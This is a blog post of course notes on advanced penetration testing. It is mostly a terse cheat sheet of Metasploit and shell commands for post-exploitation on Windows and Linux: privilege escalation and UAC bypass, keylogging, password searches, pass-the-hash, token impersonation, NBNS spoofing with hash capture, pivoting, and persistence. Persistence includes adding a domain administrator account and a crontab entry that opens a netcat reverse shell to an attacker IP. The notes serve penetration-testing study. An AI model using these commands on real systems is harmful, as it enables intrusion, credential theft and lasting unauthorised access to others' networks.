Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary (1) Metasploit Scripts: msf > use post/windows/gather/enum_logged_on_users (2) Railgun Extension for Meterpreter that allows access to the Windows API meterpreter > irb >> client.railgun.shell32.IsUserAnAdmin (3) Local Privilege Escalation: GetSystem meterpreter > getsystem (4) Local Privilege Escalation: Local Exploits msf > use exploit/windows/local/ms11_080_afdjoinleaf msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp (5) Local Privilege Escalation: Bypassing UAC msf >use exploit/windows/local/bypassuac (6) Local Privilege Escalation: Using a Public Exploit Public exploit in /usr/share/exploitdb (7) Local Information Gathering: Searching for Files
meterpreter > search -f *password* (8) Local Information Gathering: Gathering Passwords usr/share/metasploit-framework/modules/post/ windows/gather/credentials (9) Local Information Gathering: Keylogging meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop (10) Lateral Movement: PSExec msf > use exploit/windows/smb/psexec (11) Lateral Movement: Pass the Hash Replace password with the LM:NTLM hash from hashdump We are still able to authenticate using Psexec (12) Lateral Movement:Token Impersonation load incognito list tokens –u (13) Lateral Movement: SMB Capture Set up SMB capture server in Metasploit Drop into a shell in a session with an impersonated token (14) Pivoting through Metasploit route add 172.16.85.0 255.255.255.0 2 Routes traffic to 172.16.85.0/24 network through session 2 (15) Pivoting with socks4a and proxychains use auxiliary/server/socks4a Edit /etc/proxychains.conf change port to 1080 proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190 (16) NBNS Spoofing Listen for NBNS requests and respond accordingly, can get machines to send hashes or possibly even plaintext msf > use auxiliary/spoof/nbns/nbns_response msf auxiliary(nbns_response) > set spoofip 192.168.20.9 msf auxiliary(nbns_response) > exploit msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb msf auxiliary(http_ntlm) > exploit msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm msf auxiliary(http_ntlm) > set LOGFILE /root/httplog msf auxiliary(http_ntlm) > set URIPATH / msf auxiliary(http_ntlm) > set SRVPORT 80 msf auxiliary(http_ntlm) > exploit (17) Responder Automates NBNS spoofing attacks cd Responder python Responder.py –i 192.168.20.9 (A) Persistence: Adding a User net user john johnspassword /add /domain net localgroup administrators john /add /domain Add /domain at the end to add the user to a domain as well (B) Persistence: With Metasploit Script Metasploit persistence script creates an autorun entry in the registry. Not stealthy (writes to a disk) run persistence -r 192.168.20.9 -p 2345 -U (C) Persistence: Crontabs Add to /etc/crontab file */10 * * * * root nc 192.168.20.9 12345 -e /bin/bash service cron restart
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |